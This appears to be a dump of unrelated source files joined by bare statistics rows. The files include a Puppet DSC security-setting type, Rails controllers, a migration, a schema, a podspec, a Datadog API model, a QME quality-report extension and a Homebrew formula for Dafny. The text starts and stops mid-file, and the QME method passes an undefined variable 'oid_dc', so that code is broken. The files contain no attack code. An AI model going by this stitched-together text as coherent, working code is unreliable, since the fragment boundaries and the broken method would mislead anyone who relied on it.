unless ['Present', 'present', 'Absent', 'absent'].include?(value)
fail("Invalid value '#{value}'. Valid values are Present, Absent")
end
end
end
# Name: MinimumPasswordAge
# Type: sint16
# IsMandatory: False
# Values: None
newparam(:dsc_minimumpasswordage) do
def mof_type; 'sint16' end
def mof_is_embedded?; false end
desc "MinimumPasswordAge"
validate do |value|
unless value.kind_of?(Numeric) || value.to_i.to_s == value
fail("Invalid value #{value}. Should be a signed Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: MaximumPasswordAge
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_maximumpasswordage) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "MaximumPasswordAge"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: MinimumPasswordLength
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_minimumpasswordlength) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "MinimumPasswordLength"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: PasswordComplexity
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_passwordcomplexity) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "PasswordComplexity"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: PasswordHistorySize
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_passwordhistorysize) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "PasswordHistorySize"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: LockoutBadCount
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_lockoutbadcount) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "LockoutBadCount"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: ForceLogoffWhenHourExpire
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_forcelogoffwhenhourexpire) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "ForceLogoffWhenHourExpire"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: NewAdministratorName
# Type: string
# IsMandatory: False
# Values: None
newparam(:dsc_newadministratorname) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "NewAdministratorName"
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
end
end
# Name: NewGuestName
# Type: string
# IsMandatory: False
# Values: None
newparam(:dsc_newguestname) do
def mof_type; 'string' end
def mof_is_embedded?; false end
desc "NewGuestName"
validate do |value|
unless value.kind_of?(String)
fail("Invalid value '#{value}'. Should be a string")
end
end
end
# Name: ClearTextPassword
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_cleartextpassword) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "ClearTextPassword"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: LSAAnonymousNameLookup
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_lsaanonymousnamelookup) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "LSAAnonymousNameLookup"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: EnableAdminAccount
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_enableadminaccount) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "EnableAdminAccount"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: EnableGuestAccount
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_enableguestaccount) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "EnableGuestAccount"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: ResetLockoutCount
# Type: sint16
# IsMandatory: False
# Values: None
newparam(:dsc_resetlockoutcount) do
def mof_type; 'sint16' end
def mof_is_embedded?; false end
desc "ResetLockoutCount"
validate do |value|
unless value.kind_of?(Numeric) || value.to_i.to_s == value
fail("Invalid value #{value}. Should be a signed Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: LockoutDuration
# Type: sint16
# IsMandatory: False
# Values: None
newparam(:dsc_lockoutduration) do
def mof_type; 'sint16' end
def mof_is_embedded?; false end
desc "LockoutDuration"
validate do |value|
unless value.kind_of?(Numeric) || value.to_i.to_s == value
fail("Invalid value #{value}. Should be a signed Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: MaxServiceAge
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_maxserviceage) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "MaxServiceAge"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: MaxTicketAge
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_maxticketage) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "MaxTicketAge"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: MaxRenewAge
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_maxrenewage) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "MaxRenewAge"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: MaxClockSkew
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_maxclockskew) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "MaxClockSkew"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: TicketValidateClient
# Type: uint16
# IsMandatory: False
# Values: None
newparam(:dsc_ticketvalidateclient) do
def mof_type; 'uint16' end
def mof_is_embedded?; false end
desc "TicketValidateClient"
validate do |value|
unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
def builddepends
pending_relations = super()
PuppetX::Dsc::TypeHelpers.ensure_reboot_relationship(self, pending_relations)
end
end
# PowerShell provider for dsc_securitysetting. Confined to hosts with
# WMF/PowerShell >= 5.0.10586.117 and made the default provider on Windows.
Puppet::Type.type(:dsc_securitysetting).provide :powershell, :parent => Puppet::Type.type(:base_dsc).provider(:powershell) do
  confine :true => (Gem::Version.new(Facter.value(:powershell_version)) >= Gem::Version.new('5.0.10586.117'))
  defaultfor :operatingsystem => :windows
  mk_resource_methods
end
| 34.408207 | 871 | 0.661038 |
# Base controller: exposes the current-user helpers to all views and forces
# authentication on every action (redirects anonymous visitors to root).
class ApplicationController < ActionController::Base
  helper_method :current_user, :logged_in?
  before_action :authenticated_user
  require 'little-recipe-parser'

  # Memoized lookup of the signed-in user from the session; nil when the
  # session carries no user_id or the record no longer exists.
  def current_user
    return @current_user if @current_user
    @current_user = User.find_by(id: session[:user_id]) if session[:user_id]
  end

  # Boolean view of current_user.
  def logged_in?
    current_user ? true : false
  end

  # before_action guard: bounce unauthenticated requests to the root path.
  def authenticated_user
    redirect_to root_path if !logged_in?
  end
end
| 21.047619 | 82 | 0.70362 |
# CocoaPods specification for the AWSTranscribe module of the AWS iOS SDK.
# Version must stay in lock-step with the AWSCore dependency below.
Pod::Spec.new do |s|
  s.name = 'AWSTranscribe'
  s.version = '2.9.4'
  s.summary = 'Amazon Web Services SDK for iOS.'
  s.description = 'The AWS SDK for iOS provides a library, code samples, and documentation for developers to build connected mobile applications using AWS.'
  s.homepage = 'http://aws.amazon.com/mobile/sdk'
  s.license = 'Apache License, Version 2.0'
  s.author = { 'Amazon Web Services' => 'amazonwebservices' }
  s.platform = :ios, '8.0'
  s.source = { :git => 'https://github.com/aws/aws-sdk-ios.git',
               :tag => s.version}
  s.requires_arc = true
  s.dependency 'AWSCore', '2.9.4'
  s.source_files = 'AWSTranscribe/*.{h,m}'
end
| 39.722222 | 157 | 0.613986 |
# Collapses the three per-kind criteria tables (checkbox/flexible/rubric) into
# a single STI "criteria" table (note the "type" column), rewires the foreign
# keys and indexes in dependent tables, and drops the old tables. The
# drop_table blocks carry full column definitions so the migration stays
# reversible.
class MergeCriteriaTables < ActiveRecord::Migration[6.0]
  def change
    # Create new criteria table
    create_table :criteria do |t|
      t.string 'name', null: false
      t.string 'type', null: false
      t.text 'description', null: false, default: ''
      t.integer 'position', null: false
      t.decimal 'max_mark', precision: 10, scale: 1, null: false
      t.integer 'assigned_groups_count', default: 0, null: false
      t.boolean 'ta_visible', default: true, null: false
      t.boolean 'peer_visible', default: false, null: false
      t.timestamps null: false
      t.references :assessment, null: false, index: true, foreign_key: true
    end
    # Update/remove references to criteria in other tables
    # Per-kind counter caches are obsolete once criteria live in one table.
    remove_column :assessments, :checkbox_criteria_count, :integer
    remove_column :assessments, :flexible_criteria_count, :integer
    remove_column :assessments, :rubric_criteria_count, :integer
    # Polymorphic "criterion_type" discriminators are no longer needed.
    remove_column :criteria_assignment_files_joins, :criterion_type, :string, null: false
    remove_column :criterion_ta_associations, :criterion_type, :string
    remove_column :test_groups, :criterion_type, :string
    add_index :test_groups, :criterion_id
    # Repoint levels from rubric_criteria to the merged criteria table.
    remove_foreign_key :levels, :rubric_criteria
    rename_column :levels, :rubric_criterion_id, :criterion_id
    add_foreign_key :levels, :criteria
    remove_foreign_key :annotation_categories, :flexible_criteria
    add_foreign_key :annotation_categories, :criteria, column: :flexible_criterion_id
    # Marks: drop the polymorphic pair in favour of a plain criterion FK.
    remove_index :marks, column: [:markable_id, :result_id, :markable_type], name: "marks_u1", unique: true
    remove_column :marks, :markable_type, :string
    rename_column :marks, :markable_id, :criterion_id
    add_foreign_key :marks, :criteria
    # Remove old tables
    # NOTE(review): the index names in the checkbox_criteria and
    # flexible_criteria drop blocks look swapped (the checkbox block declares
    # "index_flexible_criteria_*" and vice versa). These names only matter on
    # rollback; confirm against the original migrations before reversing.
    drop_table :checkbox_criteria, cascade: :force do |t|
      t.string "name", null: false
      t.text "description"
      t.integer "position"
      t.decimal "max_mark", precision: 10, scale: 1, null: false
      t.timestamps
      t.integer "assigned_groups_count", default: 0
      t.boolean "ta_visible", default: true, null: false
      t.boolean "peer_visible", default: false, null: false
      t.bigint "assessment_id", null: false
      t.index ["assessment_id", "name"], name: "index_flexible_criteria_on_assessment_id_and_name", unique: true
      t.index ["assessment_id"], name: "index_flexible_criteria_on_assessment_id"
    end
    drop_table :flexible_criteria, cascade: :force do |t|
      t.string "name", null: false
      t.text "description"
      t.integer "position"
      t.decimal "max_mark", precision: 10, scale: 1, null: false
      t.timestamps
      t.integer "assigned_groups_count", default: 0
      t.boolean "ta_visible", default: true, null: false
      t.boolean "peer_visible", default: false, null: false
      t.bigint "assessment_id", null: false
      t.index ["assessment_id", "name"], name: "index_checkbox_criteria_on_assessment_id_and_name", unique: true
      t.index ["assessment_id"], name: "index_checkbox_criteria_on_assessment_id"
    end
    drop_table :rubric_criteria, cascade: :force do |t|
      t.string "name", null: false
      t.integer "position"
      t.decimal "max_mark", precision: 10, scale: 1, null: false
      t.timestamps
      t.integer "assigned_groups_count", default: 0
      t.boolean "ta_visible", default: true, null: false
      t.boolean "peer_visible", default: false, null: false
      t.bigint "assessment_id", null: false
      t.index ["assessment_id", "name"], name: "index_rubric_criteria_on_assessment_id_and_name", unique: true
      t.index ["assessment_id"], name: "rubric_criteria_index_1"
    end
  end
end
| 44.192771 | 112 | 0.708561 |
f8bfd5c9e26c8475aac69acfd9e323288bbb62e7 | 2,011 | # Extending QualityReport so that updating a single patient can deal with
# OID dictionaries
module QME
class QualityReport
field :aggregate_result, type: Integer
# Removes the cached results for the patient with the supplied id and
# recalculates as necessary
def self.update_patient_results(id)
# TODO: need to wait for any outstanding calculations to complete and then prevent
# any new ones from starting until we are done.
# drop any cached measure result calculations for the modified patient
QME::PatientCache.where('value.medical_record_id' => id).destroy()
# get a list of cached measure results for a single patient
sample_patient = QME::PatientCache.where({}).first
if sample_patient
cached_results = QME::PatientCache.where({'value.patient_id' => sample_patient['value']['patient_id']})
# for each cached result (a combination of measure_id, sub_id, effective_date and test_id)
cached_results.each do |measure|
# recalculate patient_cache value for modified patient
value = measure['value']
measure_model = QME::QualityMeasure.new(value['measure_id'], value['sub_id'])
oid_dictionary = OidHelper.generate_oid_dictionary(measure_model)
map = QME::MapReduce::Executor.new(value['measure_id'], value['sub_id'],
'effective_date' => value['effective_date'], 'test_id' => value['test_id'],
'oid_dictionary' => oid_dictionary)
map.map_record_into_measure_groups(id)
end
end
# remove the query totals so they will be recalculated using the new results for
# the modified patient
QME::QualityReport.where({}).each do |qr|
measure_model = QME::QualityMeasure.new(qr['measure_id'], qr['sub_id'])
oid_dictionary = OidHelper.generate_oid_dictionary(measure_model)
qr.calculate({"recalculate"=>true, "oid_dictionary" =>oid_dc},true)
end
end
end
end | 44.688889 | 112 | 0.685728 |
f8c6b9fa07d68efbd02d33e8913be3ebf3cd4883 | 960 | # encoding: utf-8
module Epuber
  class Compiler
    module FileTypes
      require_relative 'generated_file'

      # Generated navigation document: an xhtml nav for EPUB 3+, an NCX file
      # for older EPUB versions.
      class NavFile < GeneratedFile
        # @return [Epuber::Version]
        #
        attr_reader :epub_version

        # @param [Epuber::Version] epub_version  target EPUB version; selects
        #   the navigation format and destination filename
        #
        def initialize(epub_version)
          super()

          @epub_version = epub_version
          properties << :navigation

          self.destination_path = epub_version >= 3 ? 'nav.xhtml' : 'nav.ncx'
          self.path_type = :manifest
        end

        # Renders the navigation document via NavGenerator and writes it out.
        #
        # @param [Compiler::CompilationContext] compilation_context
        #
        def process(compilation_context)
          write_generate(NavGenerator.new(compilation_context).generate_nav.to_s)
        end
      end
    end
  end
end
| 22.325581 | 67 | 0.517708 |
ff4788b52c26bf56f3b7e58abac1cd3acb0a79a1 | 515 | #!/usr/bin/env ruby
require "pathname"

# Make the local checkout's lib/ loadable, then pull in the client library.
$:.unshift File.expand_path("./lib")
require "basekit"

# Smoke-test client against a local/dev REST endpoint.
# NOTE(review): all OAuth credentials are blank here — presumably filled in
# locally; this script will not authenticate as committed.
client = BaseKit::Client.new({
  :api_base_url => "http://rest.basekit.almost",
  :consumer_key => "",
  :consumer_secret => "",
  :access_token => "",
  :access_secret => "",
})

# Exercise user creation with a fixed test payload.
client.post("/users", {
  :brandRef => "1",
  :username => "test",
  :email => "[email protected]",
  :firstName => "John",
  :lastName => "Doe",
  :languageCode => "en",
  :password => "swordfish",
})
b983e4d0b8056cb67f0f8af56480c4709f42649d | 8,342 | =begin
#Datadog API V1 Collection
#Collection of all Datadog Public endpoints.
The version of the OpenAPI document: 1.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
This product includes software developed at Datadog (https://www.datadoghq.com/).
Copyright 2020-Present Datadog, Inc.
=end
require 'date'
require 'time'
module DatadogAPIClient::V1
  # Axis controls for the widget.
  # NOTE: auto-generated model (openapi-generator); edits here are normally
  # overwritten on regeneration.
  class WidgetAxis
    # whether the object has unparsed attributes
    attr_accessor :_unparsed
    # True includes zero.
    attr_accessor :include_zero
    # The label of the axis to display on the graph.
    attr_accessor :label
    # Specifies the maximum value to show on the y-axis. It takes a number, or auto for default behavior.
    attr_accessor :max
    # Specifies minimum value to show on the y-axis. It takes a number, or auto for default behavior.
    attr_accessor :min
    # Specifies the scale type. Possible values are `linear`, `log`, `sqrt`, `pow##` (e.g. `pow2`, `pow0.5` etc.).
    attr_accessor :scale
    # Attribute mapping from ruby-style variable name to JSON key.
    def self.attribute_map
      {
        :'include_zero' => :'include_zero',
        :'label' => :'label',
        :'max' => :'max',
        :'min' => :'min',
        :'scale' => :'scale'
      }
    end
    # Returns all the JSON keys this model knows about
    def self.acceptable_attributes
      attribute_map.values
    end
    # Attribute type mapping.
    def self.openapi_types
      {
        :'include_zero' => :'Boolean',
        :'label' => :'String',
        :'max' => :'String',
        :'min' => :'String',
        :'scale' => :'String'
      }
    end
    # List of attributes with nullable: true
    def self.openapi_nullable
      Set.new([
      ])
    end
    # Initializes the object
    # Unset max/min default to 'auto' and scale defaults to 'linear', matching
    # the API's documented defaults.
    # @param [Hash] attributes Model attributes in the form of hash
    def initialize(attributes = {})
      if (!attributes.is_a?(Hash))
        fail ArgumentError, "The input argument (attributes) must be a hash in `DatadogAPIClient::V1::WidgetAxis` initialize method"
      end
      # check to see if the attribute exists and convert string to symbol for hash key
      attributes = attributes.each_with_object({}) { |(k, v), h|
        if (!self.class.attribute_map.key?(k.to_sym))
          fail ArgumentError, "`#{k}` is not a valid attribute in `DatadogAPIClient::V1::WidgetAxis`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
        end
        h[k.to_sym] = v
      }
      if attributes.key?(:'include_zero')
        self.include_zero = attributes[:'include_zero']
      end
      if attributes.key?(:'label')
        self.label = attributes[:'label']
      end
      if attributes.key?(:'max')
        self.max = attributes[:'max']
      else
        self.max = 'auto'
      end
      if attributes.key?(:'min')
        self.min = attributes[:'min']
      else
        self.min = 'auto'
      end
      if attributes.key?(:'scale')
        self.scale = attributes[:'scale']
      else
        self.scale = 'linear'
      end
    end
    # Show invalid properties with the reasons. Usually used together with valid?
    # @return Array for valid properties with the reasons
    def list_invalid_properties
      invalid_properties = Array.new
      invalid_properties
    end
    # Check to see if the all the properties in the model are valid
    # @return true if the model is valid
    def valid?
      true
    end
    # Checks equality by comparing each attribute.
    # @param [Object] Object to be compared
    def ==(o)
      return true if self.equal?(o)
      self.class == o.class &&
          include_zero == o.include_zero &&
          label == o.label &&
          max == o.max &&
          min == o.min &&
          scale == o.scale
    end
    # @see the `==` method
    # @param [Object] Object to be compared
    def eql?(o)
      self == o
    end
    # Calculates hash code according to all attributes.
    # @return [Integer] Hash code
    def hash
      [include_zero, label, max, min, scale].hash
    end
    # Builds the object from hash
    # (class-level convenience wrapper around the instance method below)
    # @param [Hash] attributes Model attributes in the form of hash
    # @return [Object] Returns the model itself
    def self.build_from_hash(attributes)
      new.build_from_hash(attributes)
    end
    # Builds the object from hash
    # @param [Hash] attributes Model attributes in the form of hash
    # @return [Object] Returns the model itself
    def build_from_hash(attributes)
      return nil unless attributes.is_a?(Hash)
      self.class.openapi_types.each_pair do |key, type|
        if attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
          self.send("#{key}=", nil)
        elsif type =~ /\AArray<(.*)>/i
          # check to ensure the input is an array given that the attribute
          # is documented as an array but the input is not
          if attributes[self.class.attribute_map[key]].is_a?(Array)
            self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
          end
        elsif !attributes[self.class.attribute_map[key]].nil?
          self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
        end
      end
      self
    end
    # Deserializes the data based on type
    # Recursively converts raw JSON values into the declared openapi types;
    # unknown model payloads set _unparsed via UnparsedObject.
    # @param string type Data type
    # @param string value Value to be deserialized
    # @return [Object] Deserialized data
    def _deserialize(type, value)
      case type.to_sym
      when :Time
        Time.parse(value)
      when :Date
        Date.parse(value)
      when :String
        value.to_s
      when :Integer
        value.to_i
      when :Float
        value.to_f
      when :Boolean
        if value.to_s =~ /\A(true|t|yes|y|1)\z/i
          true
        else
          false
        end
      when :Object
        # generic object (usually a Hash), return directly
        value
      when :Array
        # generic array, return directly
        value
      when /\AArray<(?<inner_type>.+)>\z/
        inner_type = Regexp.last_match[:inner_type]
        value.map { |v| _deserialize(inner_type, v) }
      when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
        k_type = Regexp.last_match[:k_type]
        v_type = Regexp.last_match[:v_type]
        {}.tap do |hash|
          value.each do |k, v|
            hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
          end
        end
      else # model
        # models (e.g. Pet) or oneOf
        klass = DatadogAPIClient::V1.const_get(type)
        res = klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)
        if res.instance_of? DatadogAPIClient::V1::UnparsedObject
          self._unparsed = true
        end
        res
      end
    end
    # Returns the string representation of the object
    # @return [String] String presentation of the object
    def to_s
      to_hash.to_s
    end
    # to_body is an alias to to_hash (backward compatibility)
    # @return [Hash] Returns the object in the form of hash
    def to_body
      to_hash
    end
    # Returns the object in the form of hash
    # @return [Hash] Returns the object in the form of hash
    def to_hash
      hash = {}
      self.class.attribute_map.each_pair do |attr, param|
        value = self.send(attr)
        if value.nil?
          is_nullable = self.class.openapi_nullable.include?(attr)
          next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
        end
        hash[param] = _to_hash(value)
      end
      hash
    end
    # Outputs non-array value in the form of hash
    # For object, use to_hash. Otherwise, just return the value
    # @param [Object] value Any valid value
    # @return [Hash] Returns the value in the form of hash
    def _to_hash(value)
      if value.is_a?(Array)
        value.compact.map { |v| _to_hash(v) }
      elsif value.is_a?(Hash)
        {}.tap do |hash|
          value.each { |k, v| hash[k] = _to_hash(v) }
        end
      elsif value.respond_to? :to_hash
        value.to_hash
      else
        value
      end
    end
  end
end
| 29.792857 | 210 | 0.61508 |
39a51aeab4c07820f7675fdd1b0fd19071b4be6e | 1,307 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `rails
# db:schema:load`. When creating a new database, `rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2020_01_28_224837) do
  create_table "clients", force: :cascade do |t|
    t.string "name"
    t.string "role"
    t.datetime "created_at", precision: 6, null: false
    t.datetime "updated_at", precision: 6, null: false
  end
  create_table "weeks", force: :cascade do |t|
    # NOTE(review): bare integer column rather than t.references/foreign key —
    # presumably points at clients.id; confirm against the Week model.
    t.integer "client"
    t.text "monday"
    t.text "tuesday"
    t.text "wednesday"
    t.text "thursday"
    t.text "friday"
    t.text "saturday"
    # NOTE(review): "subday" looks like a typo for "sunday", but it reflects
    # the migration history — fix requires a rename migration, not a schema edit.
    t.text "subday"
    t.datetime "created_at", precision: 6, null: false
    t.datetime "updated_at", precision: 6, null: false
  end
end
| 36.305556 | 86 | 0.729916 |
bb0104012ed56c234726c4eadc81d409e73d58ae | 452 | # frozen_string_literal: true
require_relative '../../test_helper'
require_relative '../../support/utils/api_controller_test_utils'
# Read-only cities endpoint: only #index is routed; every other CRUD route
# must be absent. `api_get_works_for` / `has_no_route_for` come from the
# shared API::ControllerTestUtils helpers required above.
describe API::V1::CitiesController do
  include API::ControllerTestUtils

  # Index requires an authenticated user.
  before { sign_in users(:researcher) }

  it { api_get_works_for :index }
  it { has_no_route_for :get, :show }
  it { has_no_route_for :post, :create }
  it { has_no_route_for :patch, :update }
  it { has_no_route_for :delete, :destroy }
end
| 26.588235 | 64 | 0.736726 |
288123f4e170b4ace437bce745097e3b1b6ece67 | 2,124 | require 'rails_helper'
# Only the #index and #show examples are active; the new/create/edit/update
# examples (and the valid_attributes helper they use) are kept commented out.
RSpec.describe PlacesController, :type => :controller do

  # Builds a minimal attributes hash for the commented-out create/update specs.
  def valid_attributes
    place = FactoryGirl.build(:place)
    {name: place.name}
  end

  describe "GET 'index'" do
    before(:each) do
      get :index
    end
    it "returns http success" do
      expect(response).to be_success
    end
  end

  describe "GET 'show'" do
    render_views
    before(:each) do
      @place = FactoryGirl.create(:place)
      get :show, {:id => @place.id}
    end
    it "returns http success" do
      expect(response).to be_success
    end
    it "contains place name" do
      expect(response.body).to include(@place.name)
    end
  end

  # describe "GET 'new'" do
  #   before(:each) do
  #     get :new
  #   end
  #   it "returns http success" do
  #     expect(response).to be_success
  #   end
  #   it "assign a new place" do
  #     expect(assigns(:place)).to be_a_new(Place)
  #   end
  # end

  # describe "POST create" do
  #   describe "with valid params" do
  #     it "creates a new Place" do
  #       expect {
  #         post :create, :place => valid_attributes
  #       }.to change(Place, :count).by(1)
  #     end
  #     it "redirects to place page" do
  #       post :create, :place => valid_attributes
  #       expect(response).to redirect_to(place_path(Place.last))
  #     end
  #   end
  # end

  # describe "GET 'edit'" do
  #   before(:each) do
  #     @place = FactoryGirl.create(:place)
  #     get :edit, {:id => @place.id}
  #   end
  #   it "returns http success" do
  #     expect(response).to be_success
  #   end
  # end

  # describe "PUT update" do
  #   before(:each) do
  #     @place = FactoryGirl.create(:place)
  #   end
  #   describe "with valid params" do
  #     before(:each) do
  #       put :update, :id => @place.id,:place => {:name => 'Nuevo Alohamiento'}
  #     end
  #     it "changes place attributes" do
  #       @place.reload
  #       expect(@place.name).to eq("Nuevo Alohamiento")
  #     end
  #     it "redirects to updated place page" do
  #       expect(response).to redirect_to(@place)
  #     end
  #   end
  # end
end
| 22.83871 | 80 | 0.577213 |
# Homebrew formula for the Dafny verification-aware language. Builds Dafny
# with gradle/dotnet and vendors a pinned z3 4.8.5 solver (Dafny cannot use
# newer z3 — see upstream issue 810 referenced below).
class Dafny < Formula
  desc "Verification-aware programming language"
  homepage "https://github.com/dafny-lang/dafny/blob/master/README.md"
  url "https://github.com/dafny-lang/dafny/archive/v3.4.1.tar.gz"
  sha256 "75c86d22ed9b9b7b88b078e2f27cca6b408070dd95e865e3e57f2dc3c3cd0bbe"
  license "MIT"

  livecheck do
    url :stable
    strategy :github_latest
  end

  bottle do
    sha256 cellar: :any_skip_relocation, arm64_big_sur: "cafe436fc36a25d764dbd6df575e439946b0f053cb345dfadd24f985f267a249"
    sha256 cellar: :any_skip_relocation, big_sur: "a3d5478bedb09f2fd726b742f22487a4c871b4332b605a5e01798c5c09cc4c67"
    sha256 cellar: :any_skip_relocation, catalina: "b0fa4440abcd948f144364214b46696ef42588ae7b660c94504d42959fa53f77"
    sha256 cellar: :any_skip_relocation, x86_64_linux: "1cb42e002a7c4e005e17b60c5676aa7780acad2b598609b7a51249e5226cc205"
  end

  depends_on "gradle" => :build
  depends_on "[email protected]" => :build # for z3
  depends_on "dotnet"
  depends_on "openjdk@11"

  # Use the following along with the z3 build below, as long as dafny
  # cannot build with latest z3 (https://github.com/dafny-lang/dafny/issues/810)
  resource "z3" do
    url "https://github.com/Z3Prover/z3/archive/Z3-4.8.5.tar.gz"
    sha256 "4e8e232887ddfa643adb6a30dcd3743cb2fa6591735fbd302b49f7028cdc0363"
  end

  def install
    system "make", "exe"
    libexec.install Dir["Binaries/*", "Scripts/quicktest.sh"]
    # Build the pinned z3 and stage it under libexec/z3/bin for dafny to find.
    dst_z3_bin = libexec/"z3/bin"
    dst_z3_bin.mkpath
    resource("z3").stage do
      ENV["PYTHON"] = which("python3")
      system "./configure"
      system "make", "-C", "build"
      mv("build/z3", dst_z3_bin/"z3")
    end
    # Wrapper so `dafny` invokes the installed Dafny.dll via dotnet.
    (bin/"dafny").write <<~EOS
      #!/bin/bash
      dotnet #{libexec}/Dafny.dll "$@"
    EOS
  end

  test do
    (testpath/"test.dfy").write <<~EOS
      method Main() {
        var i: nat;
        assert i as int >= -1;
        print "hello, Dafny\\n";
      }
    EOS
